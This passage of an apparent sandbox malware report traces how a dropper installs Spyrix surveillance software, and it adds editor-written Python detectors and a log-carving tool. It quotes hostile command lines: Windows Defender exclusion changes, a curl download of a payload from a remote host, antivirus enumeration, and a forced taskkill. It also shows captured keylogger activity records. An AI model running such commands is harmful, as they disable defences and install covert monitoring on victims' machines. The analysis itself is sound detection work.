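Read in order, the process-creation evidence above is the whole chain. cmd.exe adds a Windows Defender path exclusion for the staging directory under Temp, curl --insecure fetches the payload into it, the payload runs, and the exclusion is removed again. The installer stage (the is-*.tmp paths are Inno Setup's naming) saves the existing exclusion list with reg export, adds path and process exclusions for the Security Monitor directory and its binaries, enumerates installed AV products through root\SecurityCenter2, and kills, then force-kills, a list of image names that includes the components it goes on to start. The run of `cmd /c exit 83` through `cmd /c exit 120` under plist.cmd loads one character at a time into the exit code: 83 112 121 114 105 120 are the ASCII codes of "Spyrix". The page does not show plist.cmd, so how the codes are read back (normally cmd's %=ExitCodeAscii% pseudo-variable) is an assumption. The script below is an added example by the editor, not code from the report or from the sample; it re-parses lines in the report's format (the constructed sample is copied, and the taskkill line abridged, from the evidence above) and flags each of these steps.

```python
"""Added example (editor's code, not part of the sandbox report or the sample):
re-parses "Process created" evidence lines and flags the defence-evasion steps in
this chain: Defender exclusion changes, export of the exclusion list, AV enumeration
via SecurityCenter2, curl --insecure staging, mass taskkill, and the
`cmd /c exit N` character-loading trick."""
import re
from collections import Counter

# "Source: <parent> Process created: <child image> <child command line>"
# The child image is cut at its first .exe/.com/.tmp so paths with spaces parse.
PROC_RE = re.compile(
    r"^Source: (?P<parent>.+?) Process created: "
    r"(?P<child>.+?\.(?:exe|com|tmp)|\S+)(?: (?P<cmdline>.*))?$",
    re.IGNORECASE,
)
EXCLUSION_TARGET_RE = re.compile(
    r'''-exclusion(?:path|process|extension)\s+["']*(?P<target>[^"']+)''', re.IGNORECASE
)
EXIT_RE = re.compile(r"^cmd\s+/c\s+exit\s+(\d+)$")

# (rule name, regex applied to the lower-cased child command line)
RULES = [
    ("defender_exclusion_added", re.compile(r"add-mppreference\s+-exclusion(?:path|process|extension)")),
    ("defender_exclusion_removed", re.compile(r"remove-mppreference\s+-exclusion")),
    ("defender_exclusions_exported", re.compile(
        r"reg\s+export\s+\"?hk(?:lm|ey_local_machine)\\software\\microsoft\\windows defender\\exclusions")),
    ("av_product_enumeration", re.compile(r"securitycenter2.*antivirusproduct")),
    ("insecure_download", re.compile(r"^\"?curl(?:\.exe)?\"?\s.*--insecure")),
    ("exit_code_character", EXIT_RE),
]

# Constructed sample: lines copied from the evidence above (taskkill list abridged).
SAMPLE = r"""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM sps.exe /F
"""


def parse(line):
    """Split one evidence line into (parent image, child image, child command line)."""
    m = PROC_RE.match(line.strip())
    if not m:
        return None
    return m["parent"], m["child"], m["cmdline"] or ""


def analyze(report_text):
    """Return (findings, decoded): findings is a list of (rule, child image, detail);
    decoded is the string spelled by the `cmd /c exit N` codes in order of appearance."""
    findings, exit_codes = [], []
    for line in report_text.splitlines():
        parsed = parse(line)
        if parsed is None:
            continue
        _parent, child, cmdline = parsed
        cl = cmdline.lower()
        for name, rx in RULES:
            if rx.search(cl):
                detail = ""
                if name == "defender_exclusion_added":
                    t = EXCLUSION_TARGET_RE.search(cmdline)
                    detail = t["target"] if t else ""
                findings.append((name, child, detail))
        m = EXIT_RE.match(cl)
        if m:
            exit_codes.append(int(m.group(1)))
        # taskkill with a long /IM list: stopping any running instance of the
        # components the installer is about to drop
        images = re.findall(r"/im\s+(\S+)", cl)
        if "taskkill" in cl and len(images) >= 3:
            forced = " forced" if "/f" in cl.split() else ""
            findings.append(("mass_process_kill", child, f"{len(images)} images{forced}"))
    # Assumption: the codes are read back with cmd's %=ExitCodeAscii% pseudo-variable,
    # one printable character per `exit N` (plist.cmd itself is not on the page).
    decoded = "".join(chr(c) for c in exit_codes if 32 <= c < 127)
    return findings, decoded


def rule_counts(findings):
    """How many times each rule fired."""
    return dict(Counter(name for name, _child, _detail in findings))


if __name__ == "__main__":
    found, word = analyze(SAMPLE)
    for name, child, detail in found:
        print(f"{name:<30} {child}  {detail}")
    print("exit-code string:", word)
```

Nested quoting such as `"'C:\...'"` is what reaches PowerShell after cmd strips the outer double quotes, so the target extractor skips any mix of quote characters before the path; the same parser, fed the full report, separates the two Temp staging directories from the persistent Security Monitor exclusions.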
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager02 00:13:12.87
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AC6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: {"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},tch:1;
Source: spkl.exe, 00000038.00000002.2726762987.000000000176E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager:12.877ge
Source: spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: sTitle":"Program Manager","sUser":"user"}]}
Source: spkl.exe, 00000038.00000003.2640892122.0000000004F02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 24-10-02 00:13:10.127{"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000038.00000002.2753080685.0000000007646000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: spkl.exe, 00000038.00000002.2691175840.0000000000A84000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: @@DOF_PROGMAN
Source: spkl.exe, 00000038.00000003.2640368617.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2657973984.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2661261150.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: I2024-10-02 00:13:10.127{"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000038.00000002.2726418979.0000000001755000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2661261150.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +2024-10-02 00:13:12.877{"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2750231481.0000000006A70000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2753080685.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TSCREENSHOT;45567.0091768171;explorer.exe;Program Manager;ID: 31 Window Change;userd"
Source: spkl.exe, 00000038.00000002.2746048085.0000000004F00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 24-10-02 00:13:12.877{"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: {"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:13:12.877","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}31"}
Source: spkl.exe, 00000038.00000002.2746632236.0000000006621000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: {"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}t"}
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SCREENSHOT;45567.0091768171;explorer.exe;Program Manager;ID: 31 Window Change;user
Source: spkl.exe, 00000038.00000002.2746632236.00000000065BD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: t{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}
Source: spkl.exe, 00000038.00000002.2746632236.0000000006500000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: i{"keyboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager","log":"LOG10ENTRY"}anel
Source: spkl.exe, 00000038.00000002.2742570837.00000000044E6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: CPRG_STAT;45567.0091449884;explorer.exe;Program Manager;[0,0];userP
Source: spkl.exe, 00000038.00000002.2756912357.00000000077BD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager:10.12700"
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TSCREENSHOT;45567.0091768171;explorer.exe;Program Manager;ID: 31 Window Change;user"1
Source: spkl.exe, 00000038.00000002.2753080685.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: {"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2753080685.00000000075E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}"
Source: spkl.exe, 00000038.00000003.2640368617.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000038.00000003.2657973984.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2661261150.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: o2024-10-02 00:13:10.127{"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"0","sUser":"user","SNode":"PRG_STAT","Reserved1":"0"}
Source: spkl.exe, 00000038.00000002.2753080685.00000000076C4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: yboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager","log":"LOG10ENTRY"}
Source: spkl.exe, 00000038.00000002.2758244726.00000000088C6000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2745442098.0000000004D80000.00000004.10000000.00040000.00000000.sdmp Binary or memory string: {"keyboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager","log":[{"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:13:12.877","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}]}
Source: spkl.exe, 00000038.00000002.2742570837.000000000455D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}zationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction,OptimizationHints --start-maximized --load-extension=C:\\Windows\\crx --single-argument https://dashboard.spyrix.com/";ert}
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: explorer.exe;Program Manager
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VSCREENSHOT;45567.0091768171;explorer.exe;Program Manager;ID: 31 Window Change;user
Source: spkl.exe, 00000038.00000002.2750231481.0000000006A70000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2753080685.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: {"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Managert Print to PDF
Source: spkl.exe, 00000038.00000002.2746632236.0000000006621000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: [{"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}]
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: V{"keyboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager",0s6s
Source: spkl.exe, 00000038.00000003.2657973984.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"0","sUser":"user","SNode":"PRG_STAT","Reserved1":"0"}
Source: spkl.exe, 00000038.00000002.2742570837.000000000455D000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2661525411.000000000175A000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2742570837.0000000004556000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000003.2661525411.000000000175A000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2726418979.000000000175B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}**
Source: spkl.exe, 00000038.00000002.2756912357.00000000077BD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}tionClassName = "Win32_ComputerSystem";
Source: spkl.exe, 00000038.00000003.2640368617.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2626314828.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2657973984.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +2024-10-02 00:13:09.353{"sTime":"2024-10-02 00:13:09.353","sdTime":"45567.0091360301","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000003.2626314828.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {"sTime":"2024-10-02 00:13:09.353","sdTime":"45567.0091360301","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2726418979.0000000001755000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +2024-10-02 00:13:09.353{"sTime":"2024-10-02 00:13:09.353","sdTime":"45567.0091360301","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}ubertQ
Source: spkl.exe, 00000038.00000003.2626606901.0000000004F02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 24-10-02 00:13:09.353{"sTime":"2024-10-02 00:13:09.353","sdTime":"45567.0091360301","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: [{"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:13:12.877","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}]U
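The activity-log records the report lists above as memory strings of spkl.exe (the same process memory carries the URL https://dashboard.spyrix.com/) appear in two forms: JSON objects keyed on sTime, some of them with a second clock sdTime, and semicolon-delimited lines of the shape EVENT;serial;process;title;value;user. The pairs shown above, for example sdTime 45567.0091768171 beside sTime 2024-10-02 00:13:12.877, are consistent with sdTime being an OLE Automation date (days since 1899-12-30). The script below is an added example, not code from this report or from the software it analyses: it carves both forms out of a dump, checks that the two clocks agree to the millisecond, and rebuilds a de-duplicated timeline of what the logger captured. EXCERPT is a constructed stand-in for a memory dump assembled from the strings listed above; the serial-date encoding and the set of event names it accepts are assumptions drawn from those strings.

```python
"""Carve Spyrix-style activity-log records out of a memory dump and rebuild a timeline.

Added example, not from the sandbox report or the analysed software. The record
shapes are those the report lists as memory strings of spkl.exe; EXCERPT is a
constructed dump excerpt built from them. Treating sdTime as an OLE Automation
date (days since 1899-12-30) is an assumption, verified against the sTime values.
"""
import json
import re
from datetime import datetime, timedelta

# Constructed dump excerpt: report strings concatenated with the junk bytes that
# carving from memory usually leaves around records.
EXCERPT = (
    r'o2024-10-02 00:13:10.127{"sTime":"2024-10-02 00:13:10.127","sdTime":"45567.0091449884",'
    r'"SApp":"explorer.exe","sTitle":"Program Manager","SValue":"0","sUser":"user",'
    r'"SNode":"PRG_STAT","Reserved1":"0"}'
    r'{"sTime":"2024-10-02 00:13:12.877","sdTime":"45567.0091768171","sEvent":"SCREENSHOT",'
    r'"SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user",'
    r'"SNode":"1-3","Reserved6":"31"}**'
    r'TSCREENSHOT;45567.0091768171;explorer.exe;Program Manager;ID: 31 Window Change;user"1'
    r'CPRG_STAT;45567.0091449884;explorer.exe;Program Manager;[0,0];userP'
    r'{"keyboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager","log":['
    r'{"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},'
    r'{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome",'
    r'"SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"}]}'
)

# A JSON object keyed on sTime, standalone or as an element of the "log" array
# inside the {"keyboard":..,"clipboard":..,"url":..,"log":[..]} batch wrapper.
JSON_RECORD = re.compile(r'\{"sTime":"[^"]*"[^{}]*\}')
# EVENT;serial-date;process;window title;value;user. The user field stops at the
# first byte outside [a-z0-9] because the next object in memory bleeds into it.
SEMI_RECORD = re.compile(
    r'(?P<event>ACTIVITY|APP|PRG_RUN|PRG_STAT|SCREENSHOT);(?P<serial>\d+\.\d+);'
    r'(?P<app>[^;]*);(?P<title>[^;]*);(?P<value>[^;]*);(?P<user>[a-z][a-z0-9]*)'
)

OLE_EPOCH = datetime(1899, 12, 30)


def ole_to_datetime(serial):
    """Assumed sdTime encoding: OLE Automation date, days since 1899-12-30."""
    return OLE_EPOCH + timedelta(days=float(serial))


def parse_stime(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S.%f")


def to_millis(when):
    """Milliseconds since OLE_EPOCH; used to compare clocks and to de-duplicate."""
    return round((when - OLE_EPOCH) / timedelta(milliseconds=1))


def carve_records(blob):
    """Return every record found in blob, normalised to one dict shape."""
    records = []
    for m in JSON_RECORD.finditer(blob):
        try:
            obj = json.loads(m.group(0))
        except json.JSONDecodeError:
            continue  # truncated at a page boundary or partly overwritten
        when = parse_stime(obj["sTime"])
        # When both clocks are present they must agree to the millisecond; if not,
        # the serial-date assumption is wrong for this build or the bytes are damaged.
        if "sdTime" in obj and to_millis(ole_to_datetime(obj["sdTime"])) != to_millis(when):
            continue
        records.append({
            "time": when,
            "event": obj.get("sEvent") or obj.get("SNode", "?"),  # PRG_STAT uses SNode
            "app": obj.get("SApp", ""),
            "title": obj.get("sTitle", ""),
            "value": obj.get("SValue", ""),
            "user": obj.get("sUser", ""),
            "form": "json",
        })
    for m in SEMI_RECORD.finditer(blob):
        records.append({
            "time": ole_to_datetime(m["serial"]),
            "event": m["event"], "app": m["app"], "title": m["title"],
            "value": m["value"], "user": m["user"], "form": "semicolon",
        })
    return records


def timeline(blob):
    """De-duplicate across both forms (same millisecond, event, process), sorted by time.

    Returns (timestamp to the ms, event, process, value); the JSON form wins a tie
    because its value field is the richer one.
    """
    chosen = {}
    for rec in carve_records(blob):
        key = (to_millis(rec["time"]), rec["event"], rec["app"])
        if key not in chosen or rec["form"] == "json":
            chosen[key] = rec
    rows = []
    for (ms, event, app), rec in sorted(chosen.items(), key=lambda kv: kv[0]):
        stamp = (OLE_EPOCH + timedelta(milliseconds=ms)).strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]
        rows.append((stamp, event, app, rec["value"]))
    return rows


if __name__ == "__main__":
    for row in timeline(EXCERPT):
        print("  ".join(row))
```

Run against a real dump, feed the decoded process memory (or the output of `strings`) in as `blob`; a record whose sdTime disagrees with its sTime is dropped rather than silently placed on the timeline, which is the check worth keeping if the logger build changes its clock encoding.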
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_0051EE90 cpuid 71_2_0051EE90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW, 56_2_0040AD50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 56_2_0040A298
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA, 56_2_03374CB8
